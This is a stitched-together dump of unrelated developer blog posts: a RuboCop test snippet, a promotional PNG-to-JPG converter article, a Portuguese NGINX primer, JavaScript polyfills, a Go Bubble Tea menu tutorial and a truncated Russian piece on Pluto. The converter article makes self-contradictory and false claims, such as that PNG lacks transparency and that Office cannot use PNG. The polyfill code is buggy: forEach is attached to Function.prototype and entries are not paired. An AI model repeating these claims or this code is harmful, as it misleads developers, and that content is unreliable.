it "records an offense if we use allow account_id as a string" do
source = <<~CODE
attr_accessible :foo, 'account_id'
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to_not be_blank
expect(investigation_report.offenses.first.message).to eql described_class::ERROR_MESSAGE
end
it "records an offense if we use allow account_id as symbol" do
source = <<~CODE
attr_accessible :foo, :account_id
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to_not be_blank
expect(investigation_report.offenses.first.message).to eql described_class::ERROR_MESSAGE
end
it "doesn't record an offense if no protected attribute is used" do
source = <<~CODE
attr_accessible :foo
CODE
investigation_report = commissioner.investigate(cop.parse(source))
expect(investigation_report.offenses).to be_blank
end
end
```
Now that we know how to write tests, we can use them as a starting point for building new cops, extending existing cops, and ensuring that things continue to function as our application grows and evolves. These little investments into [project-specific cops](https://evilmartians.com/chronicles/custom-cops-for-rubocop-an-emergency-service-for-your-codebase) can end up being a large investment in the future health of the projects.
**Sign up for a free trial of Aha! Develop**
Aha! Develop is a fully extendable agile development tool. Prioritize the backlog, estimate work, and plan sprints. If you are interested in an integrated [product development](https://www.aha.io/suite-overview) approach, use [Aha! Roadmaps and Aha! Develop together](https://www.aha.io/product/overviewhttps://www.aha.io/product/integrations/develop). Sign up for a [free 30-day trial](https://www.aha.io/trial) or [join a live demo](https://www.aha.io/live-demo) to see why more than 5,000 companies trust our software to build lovable products and be happy doing it. | doliveirakn |
1,275,327 | Free Online PNG to JPG Converters You Can Trust | The PNG file format is great for storing images with transparent backgrounds because it produces... | 0 | 2022-11-28T08:47:57 | https://dev.to/swangden/free-online-png-to-jpg-converters-you-can-trust-3jce | pngtojpg, png, jpg, onlineconverte | The PNG file format is great for storing images with transparent backgrounds because it produces smaller files than the JPEG image format, while still keeping image quality high. However, the PNG format doesn’t support transparency, so if you want to insert a PNG file into another document or build an HTML page, you will need an online PNG to JPG converter. Luckily, we have a great option for you! Read on for more information about the best free online PNG to JPG converters and how they can help you with your projects.
## Free PNG to JPG converters
Toolsable is a website equipped with a wide variety of free online tools including a [PNG to JPG converter](https://www.toolsable.com/en/png-to-jpg) that converts PNG files into JPG. If you have a PNG file that you need to insert into a Microsoft Word document or upload to a website, you will have to convert the file to JPG first, since those programs and websites don’t support the PNG image format. Converting your PNG files to JPG is quite easy and only takes a few seconds.
You can do this either by opening the PNG file in a photo-editing program like Photoshop and then saving it as a JPG, or you can use a [free online PNG to JPG converter](https://www.toolsable.com/en/png-to-jpg). There are several of these online converters available, with the main differences being the quality of the converted images and the number of options you have for customizing the conversion process.
## Why should you convert your PNG files to JPG?
The PNG file format is great for storing images with transparent backgrounds because it produces smaller files than the JPEG image format, while still keeping image quality high. However, the PNG format doesn’t support transparency, so if you want to insert a PNG file into another document or build an HTML page, you will need to convert it to the JPG format first.
There are a few different reasons why you might want to convert your PNG files to JPG. The most common reason is to insert the PNG file into another document or website. This is especially true if you are working in a field that requires you to use Microsoft Office programs a lot since those don’t support the PNG format.
If you want to insert an image into an Office document or website without having to save it as a different file type first, you need to convert it from a PNG to JPG first. Another reason you may want to convert your PNG files to JPG is to make a smaller file. PNG files are great for storing high-quality images with transparent backgrounds, but they produce larger file sizes than JPG images.
## How to convert PNG images to JPG?
If you have a PNG file and want to convert it to JPG, you can do so using an online PNG to JPG converter in toolsable. There are many different [PNG to JPG converters available online](https://www.toolsable.com/en/png-to-jpg), but not all of them are free. You can also use a toolsable if you want to save yourself the hassle of downloading and installing a program on your computer.
There are several key differences between free and paid PNG to JPG converters. First, most free converters let you select the image quality of the JPG file that is created.
You can also control how much the image is compressed, which affects the image quality. Paid PNG to JPG converters usually don’t give you any control over these settings, so the quality of the converted files may not be as high. Another important difference between free and paid PNG to JPG converters is the number of options you have for customizing the conversion process.
Many free converters have a very basic user interface and don’t give you many options for adjusting the conversion process. Paid converters are often more flexible and let you customize the conversion settings.
## Recommend a free online PNG to JPG converter.
There are many [free PNG to JPG converters](https://www.toolsable.com/en/png-to-jpg) available online, but many of them have very limited functionality. If you are looking for a PNG to JPG converter that gives you more control over the conversion process and lets you choose the quality setting for the JPG files you create, you can use the toolsable.
Toolsable - has one of the most popular free PNG to JPG converters available online. It has an easy-to-use interface and provides several different conversion options, including resizing the images before converting them. Toolsable also chooses the quality setting for the JPG files and also has an option to compress the JPG files further to reduce the file size even further.
## Conclusion
A PNG to JPG converter is a program or website that converts PNG files into JPG. If you have a PNG file that you need to insert into a document or website, you will have to convert the file to JPG first, since those programs and sites don’t support the PNG format.
You can do this either by opening the PNG file in a photo-editing program like Photoshop and then saving it as a JPG, or you can use a free online PNG to JPG converter like toolsable.
There are several of these online converters available, with the main differences being the quality of the converted images and the number of options you have for customizing the conversion process. | swangden |
1,226,573 | Um pouco sobre o NGINX pt.1 | O NGINX (Engine X) é um Software Open Source que tem como funcionalidade principal atender... | 0 | 2022-10-24T15:34:51 | https://dev.to/juannunesz/um-pouco-sobre-o-nginx-pt1-3c6l | nginx, devops, cahce, webdev |

O **NGINX** (Engine X) é um Software Open Source que tem como funcionalidade principal atender requisições HTTP na web.
Porém ele não serve somente para isso, não é atoa que ele é o webserver mais utilizado na internet. Além de atender requisições HTTP de forma excepcional existe uma serie de recursos que o torna cada vez mais interessante, sendo elas: proxy reverso, armazenamento em cache, balanceamento de carga, streaming de mídia e muitas vezes utilizado para funcionar como um servidor proxy para e-mail (IMAP, POP3 e SMTP). Mais a frente falo um pouco sobre cada uma dessas funcionalidades do nginx e em quais contextos são mais utilizadas.
## História por trás
O NGINX foi escrito originalmente para resolver a dificuldade que os servidores web existentes enfrentavam em lidar com grandes números (os 10K ) de conexões simultâneas.
Em 2004 seu fundador Igor Sysoev após ver seu uso crescer exponencialmente, decide a abrir o código do projeto e cria a NGINX, Inc. para dar suporte ao desenvolvimento contínuo do NGINX e comercializar o NGINX Plus como um produto comercial para clientes corporativos.
## Diferenças entre Apache e NGINX
O NGINX supera o Apache e alguns outros servidores em benchmarks que medem o desempenho de servidores web, Desde o lançamento do NGINX. No entanto, os sites evoluiram de páginas HTML estáticas para conteúdo dinâmico. O NGINX cresceu junto com ele e agora suporta todos os componentes da Web "moderna", incluindo WebSocket, HTTP/2, gRPC e streaming de vários formatos de vídeo HDS, HLS entre outros.
Além da alta customização do nginx e suporte de novos componentes da web, o que se da a sua alta performace em relação ao apache é a sua arquitetura que dita a forma na qual o webserver atende suas requisições, por sua vez o apache é "process-based server" (arquitetura baseada em processos) em que cada solicitação de conexão é tratada por um único processo. A maneira como geralmente funciona é um processo pai do servidor recebe solicitações de conexão e, quando isso acontece, ele cria (gera) um processo filho para lidar com isso. Quando outra solicitação chega, o processo pai gera um novo processo filho para lidar com a nova solicitação e assim por diante.
Porém, isso tudo acaba gerando um custo de processamento absurdo, pois, quanto mais solicitações e conexões abertas, mais recursos computacionais serão gastos.
Já no NGINX temos um outro tipo de arquitetura, uma arquitetura assíncrona e “event‑driven architecture” (Arquitetura orientada a eventos).

Significa que threads iguais são comandadas por um process_worker, e cada process_worker contém unidades menores chamadas worker_connections. Esta unidade inteira é responsável de cuidar das solicitações. worker_connections levam as solicitações até um process_worker, que por sua vez as envia para o processo master. Finalmente o processo master fornece o resultado da solicitação.
de forma simples: existe um worker principal e diversos workers menores que recebem requisiçoes, porem cada worker é assincrono e capaz de receber mais de uma requisição, ou seja, enquanto ele está devolvendo um arquivo estático de CSS o mesmo worker já está atendendo uma nova requisição e por ai vai...

Um detalhe: Os workers geralmente são criados de acordo com a quantidade de núcleos da CPU. Porém pode ser "setado" no arquivo de configuração do nginx.
Caso tenha acabado de fazer a instalação do nginx vai estar assim:
```
worker_processes: auto;
```
Desta forma ele está configurado para criar workers de acordo com a quantidade de núcleos da CPU.
Um único worker é capaz "cuidar" de até 1024 solicitações similares.
## Proxy Reverso
Quande se fala de NGINX sempre é citado o famoso Proxy reverso, mas afinal, oque seria isso?
Confesso que quando me explicaram o que era fiquei uns 2 minutos com cara de paisagem tentando entender
Bom, para entendermos o proxy reverso primeiro precisamos elucidar o conceito de proxy. Proxy é um servidor que atua como intermediário entre o usuário e a internet, recebendo as requisições e repassando. Geralmente muito utilizado dentro de empresas para bloquear acesso de sites e outros conteúdos.
Tendo essa difinição podemos dizer que um proxy reverso é um servidor intermediário que fica ao lado do servidor e não mais ao lado do cliente recebendo as requisições e redirecionando para outros servidores/serviços corretos.

Um exemplo bem simples:
```
server {
listen 80;
server_name localhost;
location / {
root /users/juan/dev/nginx;
index index.html
}
location ~ /.php$ {
proxy_pass http://localhost:8000;
}
}
```
- **server** - é um bloco designado a escrever as configurações de um servidor dentro da sua configuração. Você pode ter vários deles, cada um atendendo em uma porta diferente. Você pode expor um servidor para o mundo e ter outro interno, sem cache, por exemplo, ou até driblando a autenticação, por exemplo.
- **listen** - aqui você define em qual porta seu servidor vai aceitar as conexões.
- **location** - é a diretiva usada para definir as rotas. Elas são bem poderosas. Aceitam expressões regulares, é possível capturar as variáveis e usá-las na configuração. O sistema de location, também, conta com diferentes tipos de match.
- Sem modificador, o match é feito pelo começo da URI.
- *=* é um match exato.
- *~* é um match com expressão regular.
Nesse caso o nginx foi configurado para redirecionar toda requisição que tenha PHP para um serviço especifico, que vai executar a lógica e processar as informações, caso seja uma requisição de algum arquivo estático como uma página em html, o servidor prontamente devolverá sem precisar enviar requisição ao servidor PHP. Assim dando mais dinâmica a todo o processo.
# LoadBalancing
A maioria das vezes uma aplicação em produção tem mais de um servidor para servir ela, isso se dá pois os servidores possuem recursos finitos (CPU,Disco etc.) para atender multiplas requisições. E não é apenas sobre isso. E se o servidor sofrer uma falha de hardware? Ou até alguma falha de rede? Inúmeros motivos podem fazer sua aplicação ficar sem um fallback pra esses casos.
Nesses casos utilizamos o **Upstream** onde denominamos servidores para balancear a aplicação.
```
upstream servicos {
server localhost:8001;
server localhost:8002;
}
server {
listen 8080;
server_name localhost;
location / {
proxy_pass http://servicos;
}
}
```
Como não estamos utilizando algoritimos de balanceamento como Round robin, IP hash etc. O nosso servidor apenas vai intercalar as requisiçõe entre os serviços, ou seja, 50% das requisções vai para o localhost:8001 e 50% para o localhost:8002.
Esse é um exemplo básico, mas pode ser explorado de várias maneiras assim mitigando riscos de ter sua aplicação fora do ar.
# Considerações Finais
Objetivo desse Post é apenas dar uma pincelada sobre o webserver mais rápido do mercado e mostrar algumas caracteristicas que lhe deram esse título. No próximo Post teremos exemplos aplicados e mostrarei algumas outras funcionalidades como: Cache, Stream etc.
| juannunesz |
1,226,828 | JS Polyfills - Part 2 (forEach, keys, Values, Entries) | Github Code: JS Polyfills 4. forEach() Function: forEach(callback, thisArg) Usage:... | 0 | 2022-10-22T09:19:01 | https://dev.to/uttarasriya/js-polyfills-part-2-307d | javascript, webdev, jsitor, jspolyfill | <link rel="canonical" href="https://dev.to/uttarasriya/js-polyfills-part-2-307d"/>
**Github Code:** [JS Polyfills](https://github.com/uttara-sriya/JS-Polyfills)
**4. forEach()**
- <u>Function</u>: `forEach(callback, thisArg)`
- <u>Usage</u>: `arr.forEach((ele, index, arr)=>{...}, this)`
- <u>Description</u>: callback function will execute on every element. But not for uninitialized elements for sparse arrays.
- <u>Polyfill</u>: [forEach](https://jsitor.com/C42UCNGj9)
```javascript
//function returns undefined
Function.prototype.customForEach = function (callback) {
//this should point to array
if(Array.isArray(this)) {
for (let i = 0; i < this.length; i++) {
//check if each element exists
if(typeof this[i] !== 'undefined') {
//callback will take element, index and array as parameters
callback(this[i], i, this);
}
}
}
};
```
**5. Keys()**
- <u>Function</u>: `keys(obj)`
- <u>Usage</u>: `Obj.keys(anyobj)`
- <u>Description</u>: returns array iterator
- <u>Polyfill</u>:[Keys](https://jsitor.com/uvUwSV8D1)
```javascript
//function returns Array Iterator
Array.prototype.customKeys = function () {
let keys = [];
for (let i = 0; i < this.length; i++) {
keys.push(i);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the keys return array iterator
// A yield will pause and resume the function (Basically will return the keys one by one until done becomes true)
function* iterator() {
yield* keys;
}
return iterator();
};
```
**6. Values()**
- <u>Function</u>: `values(obj)`
- <u>Usage</u>: `Obj.values(anyobj)`
- <u>Description</u>: returns array iterator
- <u>Polyfill</u>:[Values](https://jsitor.com/kU-55C-wc)
```javascript
//function returns Array Iterator
Array.prototype.customValues = function () {
let values = [];
for (let i = 0; i < this.length; i++) {
values.push(this[i]);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the values return array iterator
// A yield will pause and resume the function (Basically will return the values one by one until done becomes true)
function* iterator() {
yield* values;
}
return iterator();
};
```
**7. Entries()**
- <u>Function</u>: `entries(obj)`
- <u>Usage</u>: `Obj.entries(anyobj)`
- <u>Description</u>: returns array iterator
- <u>Polyfill</u>:[Entries](https://jsitor.com/S865hAWaa)
```javascript
//function returns Array Iterator
Array.prototype.customEntries = function () {
let entries = [];
for (let i = 0; i < this.length; i++) {
entries.push(i, this[i]);
}
// A generator function which returns a generator object( basically follows iterator protocol)
// Why we use here? because the entries return array iterator
// A yield will pause and resume the function (Basically will return the entries one by one until done becomes true)
function* iterator() {
yield* entries;
}
return iterator();
};
```
Stay Tuned for Part 3
Keep Learning! | uttarasriya |
1,226,934 | What is the proper length for a podcast? | Podcasts come in a variety of sizes and forms. Podcasts range in length from a minute to several... | 0 | 2022-10-22T11:48:32 | https://dev.to/krishnalal7/what-is-the-proper-length-for-a-podcast-5fmf | podcast |
Podcasts come in a variety of sizes and forms.
Podcasts range in length from a minute to several hours. So, the major question is, what kind of stuff are you going to record?
If your episodes are suitable for bite-sized content, strive for 5 to 10 minutes.
If you wish to speak with a co-host, decide how long each chat will be (and make sure you have something to say, not just meandering gibberish) and keep to that time limit.
Are you putting together a story episode? Many story-based podcasts are around an hour long.
Long-form interviews and in-depth analyses? There are several that last more than an hour - up to 3-4 hours.
What is important is that you have something to say.
Turning on the microphone and making it up as you go is a recipe for disaster.
"Be On, Be Good, Be Gone," my employer pounded into my head early in my radio career.
Be On
Meaning: Be ready to speak up and be intriguing. Have a clear goal in mind and be prepared to deal with anything unexpected that may arise.
Take Care
Meaning: When you open the microphone, your audience expects you to present them with something enjoyable, thrilling, amusing, motivating, or informative that will keep them listening. You must deliver.
Go Away
Meaning: Do not overstay your welcome. When you've completed your mission, get out of dodge.
"Take as much time you need, but be as brief as you can," radio coach Tommy Kramer adds.
Understand Your Audience
As you develop your episodes, you will discover what your audience appreciates and expects from you based on how they react to your content.
Make sure you're surveying your audience, allowing them to contact you via email, and creating a community with your new listeners. It also allows you to ask them questions.
This is the most effective method for determining how to improve and change the length of your episodes.
Know Your Audience
As you develop your episodes, you will discover what your audience appreciates and expects from you based on how they react to your content.
Make sure you're surveying your audience, allowing them to contact you via email, and creating community with your new listeners. It also allows you to interrogate them
This is the most effective technique to modify and adjust the length of your episodes.
Listen to #1 [Malayalam Podcast](https://www.themalayali.in/) from kerala | krishnalal7 |
1,227,020 | Next.js E-commerce StarterKit (2022) | Intro Creating an e-commerce website might look like a simple task, but in fact, it is a... | 0 | 2022-10-22T15:59:58 | https://dev.to/kirillzhirnov/nextjs-e-commerce-starterkit-2022-6ha | ecommerce, nextjs, starterkit, tutorial | ## Intro
Creating an e-commerce website might look like a simple task, but in fact, it is a pretty complicated one: you need to find a Backend, an API, organize product listings on the Frontend, a catalog with hierarchy, filters, and search, a cart and a checkout. And don't forget about image resize. And all these parts should be done in a modern way, e.g. with Next.js and SSG.
## The solution
Ready to use Next.JS E-Commerce Starter kit!
https://github.com/kirill-zhirnov/boundless-nextjs-sample
Demo: https://blank.demos.my-boundless.app/
There are 2 ready to use themes:
https://github.com/kirill-zhirnov/boundless-marsfull-theme/
Demo: https://mars.demos.my-boundless.app/
https://github.com/kirill-zhirnov/boundless-moon-theme
Demo: https://moon.demos.my-boundless.app
The checkout is a standalone component, which can me easily customized: https://github.com/kirill-zhirnov/boundless-checkout-react
Themes use BoundlessCommerce (https://boundless-commerce.com) as a backend. There is an absolutely free tariff plan which covers small business needs.
These Next.JS sites can be easily deployed to Vercel or Netlify. If you want a longread about creating NextJS Ecommerce website - please visit our blog (I don't want to do a copy/paste :)): https://boundless-commerce.com/blog/how-to-create-a-nextjs-e-commerce-website
And if any question - please contact us - we are happy to help!
| kirillzhirnov |
1,227,087 | Simple Password Generator | Here is a simple python generator that use the "Random" module with a random.sample() method. The... | 0 | 2022-10-22T16:30:16 | https://dev.to/sngvfx/simple-password-generator-591m | generator, python | Here is a simple python generator that use the "Random" module with a random.sample() method. The generated password is a combination of upper and lowercase letters, numbers and symbols. To make the password more complex and not easy to hack, the length of the password has been set to 20.
Give it a try, feel free to improve it and let me know!
 | sngvfx |
1,227,355 | Awesome way to convert every type to Boolean on JavaScript | Compare between two variables on JavaScript maybe the thing that every developer has done on their... | 0 | 2022-10-23T03:04:35 | https://dev.to/junedang/awesome-way-to-convert-every-type-to-boolean-on-javascript-11ip | javascript, webdev | Compare between two variables on JavaScript maybe the thing that every developer has done on their daily work but there is a cool and faster way that you can impress your colleague on doing convert variable to Boolean.
## Reverse logical
We are all see the used of reverse logical logic (!) in all of our code base. In JavaScript, this symbol will convert every type into Boolean and then reverse the logic of its operation.
## What happen if you use “!!”?
This is tricky now! As I said earlier, JavaScript will cast every operation into Boolean when we attach it with “!” symbol. And when we attach another “!” logical expression here, we are doing the reverse of reverse of the logical operation thus we converting variable into Boolean type without changing variable context.
Some examples when we only use one “!” logical expression:
```JavaScript
!'' // true
!{} // false
!0 // true
!1 // false
![] // false
!undefined // true
!null // true
```
As you can see on above code, the logical of values were converted into Boolean and then be reversed it conditional evaluation.
So here is what happen when we use two “!” logical expressions:
```JavaScript
!!'' // false
!!{} // true
!!0 // false
!!1 // true
!![] // true
!!undefined // false
!!null // false
```
You can see that the values were converted into Boolean but not changing its conditional expression thus we have success convert the value into Boolean and keep it logical.
Thank you for reading and see you in other articles. | junedang |
1,227,815 | Consider Anti-corruption Layer when integrate with another system | Motivation You may be worked on projects that deal with third party APIs (APIs related to... | 0 | 2022-10-23T20:16:04 | https://dev.to/smuhammed/consider-anti-corruption-layer-when-integrate-with-another-system-2c55 | programming, bestpractice, adapter, integration | ## Motivation
You may be worked on projects that deal with third party APIs (APIs related to another service provider) or some libraries generated by another companies or you building new system but it deals with a legacy system, when you use or deal with these APIs you have to deal them with special handling in order to keep your code clean and maintainable.
## The main problem is different languages
Mostly these APIs you deal with outside your system are built with different language from that in your system, By different language I don't mean programming language I mean Domain language, Different objects and properties from that used in your system.
If you start directly use this language (Objects and Properties) in the middle of your Domain business logic, you will find that you are make explicit conversion between your system objects and third party objects, also may handle exceptions that may occur from library or handle failure of HTTP requests in the middle of your business logic, and maybe your functionality is very small or trivial but because it uses a third party API it became more complex to read and maintain.
## Meet Anti-Corruption Layer
Anti-corruption layer is one of DDD (Domain Driven Design) principles, name came from that preventing corruption of your business logic that may happen because of integration code, which tells you that if you will deal with any third party API you have to isolate integration code in different layer and any service in your system needs to use this API it should use it from Contract/Interface.
Let's take an example, If you have a Social Insurance System and want to integrate with a third party that provides **Citizen information** based on **national id**, so your system have Insurer class that belongs to your system domain like this
`Class Insurer {
private String firstName;
private String lastName;
private String nationalId;
private Integer age;
// getters and setters
}`
And third party response will be like this
`Class Citizen {
private String fullName;
private String id;
private Date dateOfBirth;
// getters and setters
}`
it's Obvious that 2 different classes and need conversion, **so how our anti-corruption layer will be look like?**
**First we will build the contract/interface as this**
`public interface CitizenSystemIntegration {
public Insurer getInsurer(String nationalId);
}`
**and our contract implementation service will be like**
`class CitizenSystemIntegrationImpl implements CitizenSystemIntegration {
@Override
public Insurer getInsurer(String nationalId) {
// build request object
// call third party api
// convert response to Insurer object
// return
}
}`
Now whenever you need this facility you can create object from this implementation and use it, listing below benefits of this strategy
- Isolating the integration code.
- Reducing code duplication , as we have one place to edit and maintain.
- You can build your exception handling logic in one place.
- Your main system functionality is clear, there is no different object you need to handle, no specific exceptions you have to deal with and your domain service is clear.
- You can add logging functionality
At the end , Anti-corruption layer is built based on same concept of Adapter Design Pattern

## Resources
- [Adapter Pattern](https://refactoring.guru/design-patterns/adapter)
- [Anti-Corruption Layer](https://www.thereformedprogrammer.net/wrapping-your-business-logic-with-anti-corruption-layers-net-core/)
IF YOU LIKED THE POST, THEN YOU CAN SUPPPORT SUCH CONTENT WITH A CUP OF COFFEE, THANKS IN ADVANCE.
<a href="https://www.buymeacoffee.com/samehmuh95" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a> | smuhammed |
1,227,837 | Processing user input in Bubble Tea with a menu component | In the last tutorial, we did a "hello world" app, and it processed just a bit of user input ("press... | 20,227 | 2022-10-23T21:25:24 | https://dev.to/andyhaskell/processing-user-input-in-bubble-tea-with-a-menu-component-222i | go, codenewbie, 100devs, tui | ---
title: Processing user input in Bubble Tea with a menu component
published: true
description:
tags: #go, #codenewbie, #100devs, #tui
series: Make slick command-line apps with Bubble Tea
---
In the last tutorial, we did a "hello world" app, and it processed just a bit of user input ("press Ctrl+C to exit").
But we didn't really get a feel for actually using user input to change the model's data, and in turn change what we see in the app. So in this tutorial, we're going to create a menu component that lets us move between buttons.
## 📝 Defining our data
The first thing we need for any Bubble Tea component is the data our model is in charge of. If you recall, in our simplePage model, the data was just the text we were displaying:
```go
type simplePage struct { text string }
```
In our menu, what we need to do is:
* Display our options
* Show which option is selected
* Additionally, let the user press the enter to go to another page. But we'll add that in a later tutorial.
* For now, we can still make an onPress function passed in that tells us what we do if the user presses enter.
So our model's data will look like this; if you're following along, write this in a file named `menu.go`.
```go
type menu struct {
options []menuItem
selectedIndex int
}
type menuItem struct {
text string
onPress func() tea.Msg
}
```
A menu is made up of menuItems, and each menuItem has text and a function handling pressing enter. In this tutorial we'll just have the app toggle between all-caps and all-lowercase so it's at least doing something.
It returns a `tea.Msg` because that's we're able to change the data in response to this user input. We'll see why in the next section, when we're implementing the `Model` interface.
## 🧋 Implementing the Model interface
If you recall, for us to use our model as a UI component, it needs to implement this interface:
```go
type Model interface {
Init() Cmd
Update(msg Msg) (Model, Cmd)
View() string
}
```
First let's write the Init function.
```go
func (m menu) Init() tea.Cmd { return nil }
```
Again, we still don't have any initial `Cmd` we need to run, so we can just return `nil`.
For the `View` function, let's make an old-school menu with an arrow to tell us which item is currently selected.
```go
func (m menu) View() string {
var options []string
for i, o := range m.options {
if i == m.selectedIndex {
options = append(options, fmt.Sprintf("-> %s", o.text))
} else {
options = append(options, fmt.Sprintf(" %s", o.text))
}
}
return fmt.Sprintf(`%s
Press enter/return to select a list item, arrow keys to move, or Ctrl+C to exit.`,
strings.Join(options, "\n"))
}
```
As mentioned in the last tutorial, one of the things that makes Bubble Tea really learnable is that the display for your UI is basically one big string. So in `menu.View` we make a slice of strings where the selected option has an arrow and the non-selected options have leading spaces. Then we join them all together and add our contols to the bottom.
Finally, let's write our Update method to handle user input.
```go
func (m menu) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg.(type) {
case tea.KeyMsg:
switch msg.(tea.KeyMsg).String() {
case "ctrl+c":
return m, tea.Quit
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
}
}
return m, nil
}
func (m menu) moveCursor(msg tea.KeyMsg) menu {
switch msg.String() {
case "up", "left":
m.selectedIndex--
case "down", "right":
m.selectedIndex++
default:
// do nothing
}
optCount := len(m.options)
m.selectedIndex = (m.selectedIndex + optCount) % optCount
return m
}
```
The `Update` method is the most complex part of this app, so let's break that down.
```go
case "ctrl+c":
return m, tea.Quit
```
Like before, we're handling the `KeyMsg` type, and we're the Ctrl+C keypress to quit the app by returning the Quit cmd.
```go
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
```
For the arrow keys, though, we use a helper function, `moveCursor`, which returns an updated model.
```go
func (m menu) moveCursor(msg tea.KeyMsg) menu {
switch msg.String() {
case "up", "left":
m.selectedIndex--
case "down", "right":
m.selectedIndex++
default:
// do nothing
}
optCount := len(m.options)
m.selectedIndex = (m.selectedIndex + optCount) % optCount
return m
}
```
The up and left KeyMsg strings serve as our "navigate up" keys, and the down and right ones navigate us down, decrementing and incrementing `m.selected`.
Then, we use the mod operator to ensure that `m.selected` is one of the indices of our options.
Finally, with the model updated, `moveCursor` returns the model that in turn is returned by `Update`, and the new model ultimately gets processed by our `View` method.
Before we move on to processing the enter key though, we should see our app run. So let's put our new `menu` component into a `main` function and run it.
```go
func main() {
m := menu{
options: []menuItem{
menuItem{
text: "new check-in",
onPress: func() tea.Msg { return struct{}{} },
},
menuItem{
text: "view check-ins",
onPress: func() tea.Msg { return struct{}{} },
},
},
}
p := tea.NewProgram(m)
if err := p.Start(); err != nil {
panic(err)
}
}
```
For now, onPress is just a no-op that returns an empty struct. Now, let's run our app.
```
go build
./check-ins
```
You should see something like this:

Cool! Now the menu can toggle what's selected! Now let's handle that user input.
## ✅ Handling the enter key and seeing what the tea.Cmd type actually does
So far, we haven't really taken a close look at the `tea.Cmd` type. It's one of the two return values for the `Update` method, but we've only used it so far to exit the app. Let's take a closer look at its type signature.
```go
type Cmd func() tea.Msg
```
A `Cmd` is some sort of function that does some stuff, and then gives us back a `tea.Msg`. That function can be time passing, it can be I/O like retrieving some data, really anything goes! The `tea.Msg` in turn gets used by our `Update` function to update our model and finally our view.
So handling a user pressing the enter key, and then running an arbitrary onPress function, is one such way to use a Cmd. So let's start with an enter button handler.
```diff
case tea.KeyMsg:
switch msg.(tea.KeyMsg).String() {
case "q":
return m, tea.Quit
case "down", "right", "up", "left":
return m.moveCursor(msg.(tea.KeyMsg)), nil
+ case "enter", "return":
+ return m, m.options[m.selectedIndex].onPress
}
```
Notice that when the user presses enter, we return the model, unchanged, but we **also** return the selected item's `onPress` function. If you recall when we defined the `menuItem` type, the type of its `onPress` field was `func() tea.Msg`. In other words, that exactly matches the `Cmd` type alias!
There's one other thing we need to do inside the `Update` method though. Right now, we're only handling the `tea.KeyMsg` type. The type we're returning for toggling the selected item's capitalization will be a brand new type ot `tea.Msg`, so we need to define it, and then add a case to our Update method for it. First, let's define the struct.
```go
type toggleCasingMsg struct{}
```
We don't need any data to be passed in, so our Msg is just an empty struct; if you recall, the `tea.Msg` type is just an empty interface, so we can have a Msg contain as much or as little data as we need.
Now back in the Update method, let's add a case for `toggleCasingMsg`!
First add the method `toggleSelectedItemCase`
```go
func (m menu) toggleSelectedItemCase() tea.Model {
selectedText := m.options[m.selectedIndex].text
if selectedText == strings.ToUpper(selectedText) {
m.options[m.selectedIndex].text = strings.ToLower(selectedText)
} else {
m.options[m.selectedIndex].text = strings.ToUpper(selectedText)
}
return m
}
```
Then add it to the `Update` method.
```diff
func (m menu) Update(msg tea.Msg) (tea.Model, tea.Cmd) {
switch msg.(type) {
+ case toggleCasingMsg:
+ return m.toggleSelectedItemCase(), nil
case tea.KeyMsg:
// our KeyMsg handlers here
```
On a toggleCasingMsg, we update the casing of the selected menu item, and then return the updated model.
Finally, in app.go, let's use our toggleCasingMsg
```diff
menuItem{
text: "new check-in",
- onPress: func() tea.Msg { return struct{}{} },
+ onPress: func() tea.Msg { return toggleCasingMsg{} },
},
menuItem{
text: "view check-ins",
- onPress: func() tea.Msg { return struct{}{} },
+ onPress: func() tea.Msg { return toggleCasingMsg{} },
},
```
Now let's try our app out!
```
go build
./check-ins
```
The app should now look like this:

Note, by the way, that at this stage of the app, this isn't the only way we could have processed enter; we also could have just processed all the toggling entirely in the update function, rather than having to process it with a Cmd. The reason I chose to use a Cmd were:
* To show a simple use case for a non-Quit Cmd in Bubble Tea
* By using a Cmd, we can pass arbitrary event handler functions into our components, a similar pattern if you've coded in React.
Next up, we've got a menu, but it's not very flashy just yet. In the next tutorial, we'll see how to use Bubble Tea to make our app look cool; first by hand, then with Bubble Tea's CSS-like Lip Gloss package! | andyhaskell |
1,228,076 | Плутон снова станет планетой? (RU) | Почему же Плутон больше не планета? В 1978 году был открыт один из спутников Плутона --... | 0 | 2022-10-24T05:50:27 | https://habr.com/ru/post/696576/ | astronomy, hobby, science, scipop | ## Почему же Плутон больше не планета?
В 1978 году был открыт один из спутников Плутона -- Харон. Помимо того, что Харон всего в 8 раз легче Плутона, Харон вращается не вокруг Плутона, а оба небесных тела вращаются вокруг общей точки масс. Помимо того, ситуация Платона усугубилась открытием в 2005 году Эриды -- ещё одной карликовой планеты, которая ещё и тяжелее Плутона.

## Дилемма
Тут у научного сообщества встал вопрос: принимать Эриду в ряды планет и рисковать увеличением списка планет, или же вовсе исключить Плутон из списка Планет и составить полное определение планеты как таковой
## Так что же такое планета?
Так, в 2006 году выбрали второй вариант -- исключить Плутон из списка Планет и составить определение полноценной планеты как таковой.
Существует всего 3 фактора для определения планеты:
> **1. Это тело вращается вокруг Солнца.**
_Вполне логичное правило, исключившее Луну, Ганимеда и другие спутники планет. Всё бы ничего но Плутон вращается именно вокруг солнца._
> **2. Это достаточно массивное, чтобы иметь шарообразную форму под воздействием собственной гравитации.**
_Тут тоже проблем нет у Плутона, как и у Луны__
> **3. Это тело имеет вблизи своей орбиты «пространство, свободное от других тел».**
_Именно здесь возникают спорные моменты: тело должно обладать достаточной массой чтоб **доминировать**, превращая все объекты на своей орбите в спутники.
Как раз с третьим пунктом Плутон лажает. Как писалось ранее -- Плутон с Хароном вращаются вокруг общей точки масс, следовательно, орбита не очищена. И именно так все объекты вроде Эриды и Плутона стали карликовыми планетами.
## Ну раз сомнений нет, к чему всё это?

Я никак не собираюсь оспаривать решение, принятое в 2006 году, я лишь хочу сказать, что наука продвинулась с 2006 года и привести некоторые доводы в пользу планеты Плутона.
### 1. Атмосфера Плутона
